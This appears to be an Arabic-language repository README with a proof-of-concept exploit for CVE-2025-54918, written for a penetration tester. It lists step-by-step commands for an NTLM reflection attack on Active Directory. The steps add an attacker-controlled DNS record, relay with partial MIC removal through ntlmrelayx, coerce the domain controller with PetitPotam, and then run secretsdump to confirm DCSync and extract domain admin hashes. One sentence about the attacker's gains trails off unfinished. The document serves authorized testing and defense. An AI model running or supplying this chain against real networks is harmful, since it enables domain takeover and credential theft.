
إثبات المفهوم لـ CVE-2025-54918 وعرض تقني.
هام:
لاختبار CVE-2025-54918، يجب عليك إنشاء سجل DNS في بيئة Active Directory المستهدفة.
استشر العميل دائمًا واحصل على تفويض صريح قبل الاختبار، حيث قد يؤثر ذلك على سلوك DNS والمصادقة في بيئات الإنتاج.
يحتوي هذا المستودع على إثبات مفهوم تقني يوضح كيفية قيام مستخدم نطاق منخفض الصلاحية بتصعيد صلاحياته إلى وصول على مستوى مسؤول النطاق عن طريق إساءة استخدام انعكاس NTLM مع الإكراه على المصادقة.
ملاحظة: الثغرة قابلة للاستغلال حتى إذا تم تعيين التوقيع على True، وهو الإعداد الافتراضي لوحدة تحكم النطاق. أيضًا، تم إصلاح CVE-2025–54918 لنظام Windows 2025، وتم إصلاح CVE-2025–33073 (بشكل غير مقصود) لنظام Windows 2022.
تحليل فني أكثر تفصيلاً متاح على صفحتي على Medium: https://yousofnahya.medium.com/hands-on-exploitation-of-cve-2025-54918-cf376ebb40e1
192.168.140.150 (التوقيع هو True وهو الإعداد الافتراضي لوحدة تحكم النطاق)192.168.140.135nahya.localtest مستخدم نطاق صالح (بدون صلاحيات DCSync)استنساخ المستودعات المطلوبة:
git clone https://github.com/dirkjanm/krbrelayx.git
git clone https://github.com/decoder-it/impacket-partial-mic.git
تحقق من أن المستخدم لا يمكنه تنفيذ DCSync قبل الاستغلال:
python3 impacket-partial-mic/examples/secretsdump.py USERNAME:PASSWORD@DC

أنشئ سجل DNS باستخدام اسم NetBIOS + 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA الذي يحل إلى IP المهاجم.
python3 dnstool.py -u 'nahya.local\USERNAME' -p 'PASSWORD' \
dc.nahya.local -a add \
-r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' \
-d '192.168.140.135' -dns-ip 192.168.140.150

شغّل ntlmrelayx مع إزالة MIC جزئية وتمكين تصعيد LDAP:
python3 impacket-partial-mic/examples/ntlmrelayx.py --remove-mic-partial -smb2support -t ldaps://DC --escalate-user USERNAME --no-validate-privs

أجبر وحدة تحكم النطاق على المصادقة على سجل DNS الذي يتحكم فيه المهاجم باستخدام تقنية الإكراه (PetitPotam):
nxc smb DC -u 'USERNAME' -p 'PASSWORD' -M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA

أعد تشغيل secretsdump لتأكيد تصعيد الصلاحية:
python3 impacket-partial-mic/examples/secretsdump.py USERNAME:PASSWORD@DC
✅ النتيجة المتوقعة: نجاح DCSync واسترداد تجزئات مسؤول النطاق

في هذه المرحلة، يكون المهاجم قد:
راجع مقالة Medium للحصول على شرح متعمق للثغرة وسلسلة الهجوم.
لم يكن هذا العمل ممكنًا بدون:
impacket-partial-micتحليل ثغرة تجاوز مصادقة NTLM و LDAP – مدونة CrowdStrike
https://www.crowdstrike.com/en-us/blog/analyzing-ntlm-ldap-authentication-bypass-vulnerability/
إرشادات أمان Microsoft – CVE-2025-54918 – دليل تحديث MSRC
https://msrc.microsoft.com/update-guide/advisory/CVE-2025-54918
تم توفير إثبات المفهوم هذا للأغراض التعليمية واختبار الأمان المصرح به فقط.